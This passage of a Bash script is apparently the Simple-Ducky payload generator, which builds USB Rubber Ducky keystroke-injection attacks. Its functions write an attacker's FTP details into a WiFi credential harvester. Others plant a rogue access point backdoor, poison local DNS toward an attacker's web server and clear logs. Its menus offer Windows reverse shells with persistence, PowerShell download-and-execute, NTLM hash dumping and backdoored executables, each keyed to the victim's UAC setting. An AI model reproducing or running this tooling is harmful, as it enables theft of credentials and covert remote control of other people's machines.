| echo "6) Click the "Specific address:" radio button and select $attackerip / the attacking machines IP address" | |
| echo "" | |
| echo '7) Select the "History" tab to view the traffic from the victims machine' | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| echo "" | |
| echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m" | |
| echo "" | |
| sleep 3 | |
| fi | |
| f_attackadd | |
| } | |
| ####### WiFi Credential Harvest Option ########### | |
| f_wificreds(){ | |
| clear | |
| echo -e "\e[1;34mLet's configure some settings for the credential extraction...\e[0m" | |
| echo "" | |
| echo "" | |
| read -p "What is the IP/Domain of your ftp server? " attackerftp | |
| echo "" | |
| read -p "What is the username for your ftp server? " attackerusername | |
| echo "" | |
| read -p "What is the password for your ftp server? " attackerpassword | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAdding the wifi credential extractor to your payload...\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/builder/main-attack/wificred.conf > /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del1.conf | |
| sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del2.conf | |
| sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del2.conf > /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del3.conf | |
| cat /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del3.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del1.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del2.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/wificred_del3.conf | |
| echo "" | |
| echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m" | |
| echo "" | |
| sleep 3 | |
| f_attackadd | |
| } | |
| ####### Rogue Access Point Option ########### | |
| f_rogueaccess(){ | |
| clear | |
| echo -e "\e[1;34mLet's configure some settings for the rogue access point...\e[0m" | |
| echo "" | |
| echo "" | |
| read -p "What would you like the SSID to be? " attackerssid | |
| echo "" | |
| read -p "What would you like the AP's key to be? " attackerkey | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAdding the rogue access point option to your payload...\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerssid/$attackerssid/g" /usr/share/simple-ducky/payloads/builder/main-attack/wifibackdoor.conf > /usr/share/simple-ducky/payloads/builder/main-attack/wifibackdoor_del1.conf | |
| sed "/STRING/s/attackerkey/$attackerkey/g" /usr/share/simple-ducky/payloads/builder/main-attack/wifibackdoor_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/wifibackdoor_del2.conf | |
| cat /usr/share/simple-ducky/payloads/builder/main-attack/wifibackdoor_del2.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/wifibackdoor_del1.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/wifibackdoor_del2.conf | |
| echo "" | |
| echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m" | |
| echo "" | |
| sleep 3 | |
| f_attackadd | |
| } | |
| ####### Auto Connect to Access Point Option ########### | |
| f_autoassociate(){ | |
| clear | |
| echo -e "\e[1;34mAdding the wifi auto connect option to your payload...\e[0m" | |
| echo "" | |
| sleep 3 | |
| cat /usr/share/simple-ducky/payloads/builder/main-attack/wifiautoconnect.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| echo "" | |
| echo -e "\e[1;32mDone! Returning to the Main-Attack menu...\e[0m" | |
| echo "" | |
| echo -e "\e[1;33mThe victim will auto connect to: Pineapple\e[0m" | |
| echo "" | |
| read -p "Press Enter to continue..." continue | |
| f_attackadd | |
| } | |
| ####### Local DNS Poisoning Option ########### | |
| f_dnspoison(){ | |
| clear | |
| echo -e "\e[1;34mLet's configure some settings for the DNS poisoning attack. Note: you run this as many times as you would like..\e[0m" | |
| echo "" | |
| echo "" | |
| read -p "What is the IP address of your attacking webserver? " attackerip | |
| echo "" | |
| read -p "What website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAdding DNS poisoning to your payload...\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/builder/main-attack/localdns.conf > /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del1.conf | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del1.conf > /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del2.conf | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del2.conf > /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del3.conf | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del3.conf > /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del4.conf | |
| cat /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del4.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del1.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del2.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del3.conf | |
| rm /usr/share/simple-ducky/payloads/builder/main-attack/localdns_del4.conf | |
| echo "" | |
| echo -e "\e[1;32mDone! Returning to the Pre-Attack menu...\e[0m" | |
| echo "" | |
| sleep 3 | |
| f_attackadd | |
| } | |
| ############ Post Attack Option Add ########################### | |
| ####### Clear all logs Option ########### | |
| f_clearlogs(){ | |
| clear | |
| echo -e "\e[1;34mAdding the clear all logs option to your payload...\e[0m" | |
| echo "" | |
| sleep 3 | |
| cat /usr/share/simple-ducky/payloads/builder/post-attack/clearlogs.conf >> /usr/share/simple-ducky/payload.txt | |
| echo >> /usr/share/simple-ducky/payload.txt | |
| echo "" | |
| echo -e "\e[1;32mDone! Returning to the Post-Attack menu...\e[0m" | |
| echo "" | |
| sleep 3 | |
| f_postattackadd | |
| } | |
| ####### Inject.bin ########### | |
| f_injectcreate(){ | |
| clear | |
| echo -e "\e[1;34mHow would you like to exit?\e[0m" | |
| echo "" | |
| echo '1. Exit the command prompt and the leave the machine "as is"' | |
| echo "2. Exit the command prompt and lock the screen" | |
| echo "" | |
| read -p "Option: " exitoption | |
| if [ "$exitoption" == "1" ]; then | |
| clear | |
| echo -e "\e[1;34mHow long of a delay would like before starting?\e[0m " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mFinalizing your payload...\e[0m" | |
| echo "" | |
| sleep 3 | |
| cat /usr/share/simple-ducky/payloads/builder/post-attack/finish.conf >> /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| sed '/^$/d' /usr/share/simple-ducky/payload.txt >> /usr/share/simple-ducky/payload1.txt | |
| cat /usr/share/simple-ducky/payload1.txt > /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload1.txt | |
| echo "" | |
| echo -e "\e[1;32mDone! Let's generate your inject.bin...\e[0m" | |
| echo "" | |
| sleep 3 | |
| elif [ "$exitoption" == "2" ]; then | |
| clear | |
| echo -e "\e[1;34mHow long of a delay would like before starting?\e[0m " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mFinalizing your payload...\e[0m" | |
| echo "" | |
| sleep 3 | |
| cat /usr/share/simple-ducky/payloads/builder/post-attack/finishlock.conf >> /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| sed '/^$/d' /usr/share/simple-ducky/payload.txt >> /usr/share/simple-ducky/payload1.txt | |
| cat /usr/share/simple-ducky/payload1.txt > /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload1.txt | |
| echo "" | |
| echo -e "\e[1;32mDone! Let's generate your inject.bin...\e[0m" | |
| echo "" | |
| sleep 3 | |
| fi | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| echo -e "\e[1;34mI'm going to make sure that your FTP and Webserver are running.\e[0m" | |
| echo "" | |
| sleep 3 | |
| service pure-ftpd start | |
| service apache2 start | |
| echo "" | |
| echo -e "\e[1;32mYour FTP and Webserver are running.\e[0m" | |
| echo "" | |
| read -p "Press Enter to return to the main menu" | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| f_mainmenu | |
| } | |
| ################################################################################# | |
| # Dependency Installer | |
| ################################################################################# | |
| f_installer(){ | |
| clear | |
| echo -e "\e[1;34m[*] Performing an APT Update prior to installing dependencies...\e[0m\n" | |
| sleep 3 | |
| apt-get update | |
| echo "" | |
| echo -e "\e[1;32m[+] APT Update complete...\e[0m" | |
| sleep 3 | |
| clear | |
| echo -e "\e[1;34m[*] Please wait while I install some dependencies...\e[0m\n" | |
| sleep 3 | |
| updatedb | |
| mkdir /tmp/simple-ducky/ | |
| echo "" | |
| machine=$(cat /etc/issue) | |
| if [ "$machine" == "Kali GNU/Linux 1.0 \n \l" ]; then | |
| echo -e "\n\e[1;34m[*] I see that you are using Kali-Linux. This will only take a few moments...\e[0m" | |
| echo "" | |
| sleep 3 | |
| f_kaliinstall | |
| else | |
| f_otherdebian | |
| fi | |
| } | |
| ######################################################## | |
| # Kali Install | |
| ######################################################## | |
| f_kaliinstall(){ | |
| reqs="pure-ftpd dfu-programmer burpsuite mingw32" | |
| for i in $reqs; do | |
| dpkg -s "$i" &> /tmp/simple-ducky/$i-install.txt | |
| isinstalled=$(cat /tmp/simple-ducky/$i-install.txt | grep -o "Status: install ok installed") | |
| if [ ! -e /usr/bin/$i ] && [ ! -e /usr/sbin/$i ] && [ ! -e /usr/local/sbin/$i ] && [ ! -e /usr/local/bin/$i ] && [ -z "$isinstalled" ]; then | |
| echo -e "\e[1;33m[-] It doesn't appear that $i is installed on your system. Installing it now...\e[0m" | |
| echo "" | |
| if [ ! -z $(apt-get install -y "$i" | grep -o "E: Couldn") ]; then | |
| echo -e "\e[1;31m[-] I had a hard time installing $i from the Kali-Linux repository.\e[0m" | |
| touch /tmp/simple-ducky/$i-fail | |
| else | |
| dpkg -s "$i" &> /tmp/simple-ducky/$i-install.txt | |
| isinstalled=$(cat /tmp/simple-ducky/$i-install.txt | grep -o "Status: install ok installed") | |
| if [ ! -z "$isinstalled" ]; then | |
| update=1 | |
| echo -e "\e[1;32m[+] Good news, $i installed without any issues.\e[0m" | |
| echo "" | |
| sleep 2 | |
| else | |
| echo "" | |
| echo -e "\e[1;31m[!] It doesn't appear that I will be able to install $i right now.\e[0m" | |
| echo "" | |
| sleep 2 | |
| fi | |
| fi | |
| else | |
| echo -e "\e[1;32m[+] $i is already installed on your system, moving on...\e[0m" | |
| echo "" | |
| sleep 2 | |
| fi | |
| done | |
| f_java | |
| } | |
| ######################################################## | |
| # Other Debian Install | |
| ######################################################## | |
| f_otherdebian(){ | |
| reqs="pure-ftpd file-roller dfu-programmer apache2 burpsuite nmap p7zip-full mingw32" | |
| for i in $reqs; do | |
| dpkg -s "$i" &> /tmp/simple-ducky/$i-install.txt | |
| isinstalled=$(cat /tmp/simple-ducky/$i-install.txt | grep -o "Status: install ok installed") | |
| if [ ! -e /usr/bin/$i ] && [ ! -e /usr/sbin/$i ] && [ ! -e /usr/local/sbin/$i ] && [ ! -e /usr/local/bin/$i ] && [ -z "$isinstalled" ]; then | |
| echo -e "\e[1;33m[-] It doesn't appear that $i is installed on your system. Installing it now...\e[0m" | |
| echo "" | |
| if [ ! -z $(apt-get install -y "$i" | grep -o "E: Couldn") ]; then | |
| echo -e "\e[1;31m[-] I had a hard time installing $i from the Kali-Linux repository.\e[0m" | |
| touch /tmp/simple-ducky/$i-fail.txt | |
| else | |
| dpkg -s "$i" &> /tmp/simple-ducky/$i-install.txt | |
| isinstalled=$(cat /tmp/simple-ducky/$i-install.txt | grep -o "Status: install ok installed") | |
| if [ ! -z "$isinstalled" ]; then | |
| update=1 | |
| echo -e "\e[1;32m[+] Good news, $i installed without any issues.\e[0m" | |
| echo "" | |
| sleep 2 | |
| else | |
| echo "" | |
| echo -e "\e[1;31m[!] It doesn't appear that I will be able to install $i right now.\e[0m" | |
| echo "" | |
| sleep 2 | |
| fi | |
| fi | |
| else | |
| echo -e "\e[1;32m[+] $i is already installed on your system, moving on...\e[0m" | |
| echo "" | |
| sleep 2 | |
| fi | |
| done | |
| f_metasploit | |
| } | |
| ######################################################## | |
| # Metasploit | |
| ######################################################## | |
| f_metasploit(){ | |
| clear | |
| echo -e "\e[1;34m[*] Checking to see if Metasploit is installed...\e[0m\n" | |
| if [ ! -e /usr/bin/msfconsole ] && [ ! -e /usr/sbin/msfconsole ] && [ ! -e /usr/local/sbin/msfconsole ] && [ ! -e /usr/local/bin/msfconsole ]; then | |
| update=1 | |
| echo -e "\n\e[1;34m[*] It doesn't appear that Metasploit is installed on your system. Installing it now...\e[0m" | |
| echo "" | |
| machine=$(uname -m) | |
| if [ "$machine" == "x86_64" ]; then | |
| wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run -O /tmp/simple-ducky/metasploit-latest-linux-x64-installer.run | |
| echo -e "\n\e[1;33m[*] Launching the Metasploit installer. Select all the defaults and DONT launch the web UI...\e[0m" | |
| echo "" | |
| sleep 3 | |
| chmod 755 /tmp/simple-ducky/metasploit-latest-linux-x64-installer.run | |
| /tmp/simple-ducky/metasploit-latest-linux-x64-installer.run | |
| else | |
| wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run -O /tmp/simple-ducky/metasploit-latest-linux-installer.run | |
| echo -e "\n\e[1;33m[*] Launching the Metasploit installer. Select all the defaults and DONT launch the web UI...\e[0m" | |
| echo "" | |
| sleep 3 | |
| chmod 755 /tmp/simple-ducky/metasploit-latest-linux-installer.run | |
| /tmp/simple-ducky/metasploit-latest-linux-installer.run | |
| fi | |
| cd /usr/bin | |
| msfprogs="msfconsole msfupdate msfencode msfpayload" | |
| for z in $msfprogs; do | |
| if [ ! -e /usr/bin/$z ]; then | |
| ln -f -s /usr/local/bin/$z $z | |
| fi | |
| done | |
| fi | |
| echo -e "\e[1;32m[+] Good news, Metasploit installed without any issues.\e[0m" | |
| echo "" | |
| sleep 2 | |
| f_setoolkit | |
| } | |
| ######################################################## | |
| # SE-Toolkit | |
| ######################################################## | |
| f_setoolkit(){ | |
| clear | |
| echo -e "\e[1;34m[+] Checking to see if the Social Engineering Toolkit is installed...\e[0m\n" | |
| echo "" | |
| sleep 4 | |
| dpkg -s "set" &> /tmp/simple-ducky/set-install.txt | |
| setoolkit=$(cat /tmp/simple-ducky/set-install.txt | grep -o "Status: install ok installed") | |
| if [ "$setoolkit" == "Status: install ok installed" ]; then | |
| echo -e "\e[1;32m[+] The SE-Toolkit is already installed on your system, moving on...\e[0m" | |
| echo "" | |
| sleep 4 | |
| else | |
| echo -e "\e[1;33m[-] It doesn't appear that the SE-Toolkit is installed on your system. Installing it now...\e[0m" | |
| echo -e "" | |
| sleep 3 | |
| git clone https://github.com/trustedsec/social-engineer-toolkit/ /tmp/simple-ducky/set/ | |
| chmod 755 /tmp/simple-ducky/set/setup.py | |
| python /tmp/simple-ducky/set/setup.py install | |
| echo "" | |
| echo -e "\e[1;32m[+] Good news, the SE-Toolkit installed without any issues.\e[0m" | |
| echo "" | |
| sleep 2 | |
| fi | |
| bsuite=$(cat /tmp/simple-ducky/burpsuite-install.txt | grep -o "is not installed" ) | |
| if [ "$bsuite" == "is not installed" ]; then | |
| f_burpsuite | |
| else | |
| f_java | |
| fi | |
| } | |
| ######################################################## | |
| # Burpsuite | |
| ####################################################### | |
| f_burpsuite(){ | |
| clear | |
| echo -e "\e[1;34mTrying a different approach to install Burpsuite...\e[0m\n" | |
| echo "" | |
| sleep 3 | |
| mkdir /usr/share/burpsuite/ | |
| wget http://portswigger.net/burp/burpsuite_free_v1.5.jar -O /usr/share/burpsuite/burpsuite.jar | |
| chmod 755 /usr/share/burpsuite/burpsuite.jar | |
| ln -s /usr/share/burpsuite/burpsuite.jar /usr/bin/burpsuite.jar | |
| echo "" | |
| echo -e "\e[1;32m[+] Good news, Burpsuite installed without any issues.\e[0m" | |
| sleep 3 | |
| clear | |
| f_java | |
| } | |
| ######################################################## | |
| # JavaInstall | |
| ######################################################## | |
| f_java(){ | |
| clear | |
| echo -e "\e[1;34m[+] Checking your JDK version, I will update it if needed...\e[0m\n" | |
| echo "" | |
| sleep 4 | |
| java -version &> /tmp/simple-ducky/java-version.txt | |
| javainstall=$(cat /tmp/simple-ducky/java-version.txt | grep -o "1.7.0") | |
| if [ "$javainstall" == "1.7.0" ]; then | |
| echo -e "\e[1;32m[+] It looks like your JDK is up to date, moving on..." | |
| sleep 4 | |
| else | |
| echo -e "\e[1;33m[+] It looks like we need to update JDK to version 1.7.0\e[0m" | |
| echo -e "" | |
| sleep 3 | |
| apt-get install -y openjdk-7-jre-headless | |
| echo "" | |
| echo -e "\e[1;33m[*] When prompted select the option for: '...java-7-openjdk...'\e[0m" | |
| echo "" | |
| sleep 4 | |
| update-alternatives --config java | |
| echo "" | |
| echo -e "\e[1;32m[+] Your new JDK version is...\e[0m" | |
| echo "" | |
| java -version | |
| sleep 5 | |
| clear | |
| fi | |
| f_cleanupexit | |
| } | |
| ################################################################################# | |
| # Cleanup and Return to the Main Menu | |
| ################################################################################# | |
| f_cleanupexit(){ | |
| echo "" | |
| echo -e "\e[1;32m[+] The installation process is complete! Returning to the main menu...\e[0m" | |
| echo "" | |
| sleep 5 | |
| rm -rf /tmp/simple-ducky/ | |
| clear | |
| f_mainmenu | |
| } | |
| ################################################################################# | |
| ################################################################################# | |
| # | |
| # Menu Section | |
| # | |
| ################################################################################# | |
| ################################################################################# | |
| ################################################################################# | |
| # Main Menu - Banner | |
| ################################################################################# | |
| f_banner(){ | |
| clear | |
| echo -e "\e[1;31mSimple-Ducky Payload Generator\e[0m " | |
| echo -e "Get your USB Rubber Ducky @ http://hakshop.myshopify.com/" | |
| echo -e "If you would like to submit your payload send it to skysploit@gmail.com" | |
| echo -e "\e[1;31mHak5 forums:\e[0m http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/" | |
| echo -e "\e[1;31mSimple-Ducky:\e[0m https://code.google.com/p/simple-ducky-payload-generator/" | |
| echo -e "\e[1;31mDucky-Decode:\e[0m https://code.google.com/p/ducky-decode/" | |
| echo -e "\e[1;31mSimple-Ducky Author:\e[0m Travis Weathers (skysploit) | skysploit@gmail.com" | |
| echo -e "\e[1;31mEncoder by:\e[0m ApacheTech & Midnitesnake \e[1;31mEncoder Version:\e[0m v2.6" | |
| echo -e "\e[1;31mLast Modified:\e[0m 22 JUN 2013 \e[1;31mSimple-Ducky Version:\e[0m v1.1.1" | |
| echo -e "" | |
| } | |
| ################################################################################# | |
| # Main Menu - Options | |
| ################################################################################# | |
| f_mainmenu(){ | |
| f_banner | |
| echo -e "\e[1;34mWhere would you like to start?\e[0m" | |
| echo "" | |
| echo "1. Custom Payload Builder" | |
| echo "2. Windows Reverse Shell Payloads" | |
| echo "3. WiFi Attacks" | |
| echo "4. Password Attacks" | |
| echo "5. Linux & OS X Payloads" | |
| echo "6. Forced Phishing & Web Attacks" | |
| echo "7. Clean up the Encoder directory" | |
| echo "8 Executables with Durandal Backdoor (DBD)" | |
| echo "9. Dependency Checker" | |
| echo "10.FTP Server Setup/User Add" | |
| echo "11.LM/NTLM Password Hasher" | |
| echo "12.Site2lst Custom Wordlist Builder" | |
| echo "13.Quit" | |
| echo "" | |
| read -p "Option: " option | |
| case $option in | |
| 1) f_payloadbuilder ;; | |
| 2) f_windowsshellmenu ;; | |
| 3) f_wifimenu ;; | |
| 4) f_passwordmenu ;; | |
| 5) f_linuxosxmenu ;; | |
| 6) f_forcedphishmenu ;; | |
| 7) f_cleanup ;; | |
| 8) f_dbdbuilder ;; | |
| 9) f_installer ;; | |
| 10) f_ftpsetup ;; | |
| 11) f_lmntlmhasher ;; | |
| 12) f_site2lst ;; | |
| 13) clear;exit ;; | |
| adv) f_advancedmenu ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Windows Reverse Shell - Banner | |
| ################################################################################# | |
| f_winshellbanner(){ | |
| clear | |
| echo -e "\e[1;31mSimple-Ducky Payload Generator\e[0m " | |
| echo -e "Windows reverse shell payloads of various types" | |
| echo -e "If you would like to contribute your payload contact the author at skysploit@gmail.com" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)" | |
| echo -e "" | |
| } | |
| ################################################################################# | |
| # Windows Reverse Shell - Options | |
| ################################################################################# | |
| f_windowsshellmenu(){ | |
| f_winshellbanner | |
| echo -e "\e[1;34mWhat payload would you like to use?\e[0m" | |
| echo "" | |
| echo "1. DBD Reverse SYSTEM Shell (SSL & Persistant) (Win Vista/7)" | |
| echo "2. DBD Reverse SYSTEM Shell (SSL & Persistant) (Win 8)" | |
| echo "3. Persistence Reverse Shell (Win Vista/7)" | |
| echo "4. Persistence Reverse Shell (Win 8)" | |
| echo "5. Windows Reverse Shell (No Download|W2K/XP)" | |
| echo "6. Windows Reverse Shell (No Download|Win Vista/7)" | |
| echo "7. Windows Reverse Shell (No Download|Win 8)" | |
| echo "8. Powershell Download & Execute (User Priv Shell|Win Vista/7)" | |
| echo "9. Powershell Download & Execute (Admin Priv Shell|Win Vista/7)" | |
| echo "10.Powershell Download & Execute (User Priv Shell|Win 8)" | |
| echo "11.Powershell Download & Execute (Admin Priv Shell|Win 8)" | |
| echo "12.Return to Main Menu" | |
| echo "13.Quit" | |
| echo "" | |
| read -p "Option: " option | |
| if [ "$option" == "1" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_windowsdbdVIS7uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_windowsdbdVIS7nouac | |
| fi | |
| elif [ "$option" == "2" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_windowsdbdwin8uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_windowsdbdwin8nouac | |
| fi | |
| elif [ "$option" == "3" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_persistenceVIS7uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_persistenceVIS7nouac | |
| fi | |
| elif [ "$option" == "4" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_persistenceWIN8uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_persistenceWIN8nouac | |
| fi | |
| elif [ "$option" == "5" ]; then | |
| f_windowsrevW2KXP | |
| elif [ "$option" == "6" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_windowsrevVIS7uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_windowsrevVIS7nouac | |
| fi | |
| elif [ "$option" == "7" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_windowsrevWIN8uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_windowsrevWIN8nouac | |
| fi | |
| elif [ "$option" == "8" ]; then | |
| f_powershellVIS7 | |
| elif [ "$option" == "9" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_powershellVIS7admuac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_powershellVIS7admnouac | |
| fi | |
| elif [ "$option" == "10" ]; then | |
| f_powershellWIN8 | |
| elif [ "$option" == "11" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_powershellWIN8admuac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_powershellWIN8admnouac | |
| fi | |
| elif [ "$option" == "12" ]; then | |
| f_mainmenu | |
| elif [ "$option" == "13" ]; then | |
| clear;exit | |
| elif [ "$option" == "*" ]; then | |
| clear;exit | |
| fi | |
| } | |
| ################################################################################# | |
| # Wifi Attacks - Banner | |
| ################################################################################# | |
| f_wifibanner(){ | |
| clear | |
| echo -e "\e[1;31mSimple-Ducky Payload Generator\e[0m " | |
| echo -e "Some of these payloads go great with the WiFi Pineapple" | |
| echo -e "If you would like to contribute your payload contact the author at skysploit@gmail.com" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)" | |
| echo -e "" | |
| } | |
| ################################################################################# | |
| # Wifi Attacks - Options | |
| ################################################################################ | |
| f_wifimenu(){ | |
| f_wifibanner | |
| echo -e "\e[1;34mWhat payload would you like to use?\e[0m" | |
| echo "" | |
| echo "1. WiFi Backdoor (Win Vista/7)" | |
| echo "2. WiFi Backdoor (Win 8)" | |
| echo "3. WiFi Autoconnect (Designed for the WiFi Pineapple | Win Vista/7)" | |
| echo "4. WiFi Autoconnect (Designed for the WiFi Pineapple | Win 8)" | |
| echo "5. Return to Main Menu" | |
| echo "6. Quit" | |
| echo "" | |
| read -p "Option: " option | |
| if [ "$option" == "1" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_wifibackdoorVIS7uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_wifibackdoorVIS7nouac | |
| fi | |
| elif [ "$option" == "2" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_wifibackdoorWIN8uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_wifibackdoorWIN8nouac | |
| fi | |
| elif [ "$option" == "3" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_wifiautoconnectVIS7uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_wifiautoconnectVIS7nouac | |
| fi | |
| elif [ "$option" == "4" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_wifiautoconnectWIN8uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_wifiautoconnectWIN8nouac | |
| fi | |
| elif [ "$option" == "5" ]; then | |
| f_mainmenu | |
| elif [ "$option" == "6" ]; then | |
| clear;exit | |
| elif [ "$option" == "*" ]; then | |
| clear;exit | |
| fi | |
| } | |
| ################################################################################# | |
| # Password Attacks - Banner | |
| ################################################################################# | |
| f_passwordbanner(){ | |
| clear | |
| echo -e "\e[1;31mSimple-Ducky Payload Generator\e[0m " | |
| echo -e "Awww... The power of credential harvesting." | |
| echo -e "If you would like to contribute your payload contact the author at skysploit@gmail.com" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)" | |
| echo -e "" | |
| } | |
| ################################################################################# | |
| # Password Attacks - Options | |
| ################################################################################ | |
| f_passwordmenu(){ | |
| f_passwordbanner | |
| echo -e "\e[1;34mWhat payload would you like to use?\e[0m" | |
| echo "" | |
| echo "1. LM/NTLM Hash Dump From Live System (Win Vista/7)" | |
| echo "2. LM/NTLM Hash Dump From Live System (Win 8)" | |
| echo "3. WiFi Acess Point Crediential Harvester (Win Vista/7)" | |
| echo "4. WiFi Acess Point Crediential Harvester (Win 8)" | |
| echo "5. Return to Main Menu" | |
| echo "6. Quit" | |
| echo "" | |
| read -p "Option: " option | |
| if [ "$option" == "1" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_livehashVIS7uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_livehashVIS7nouac | |
| fi | |
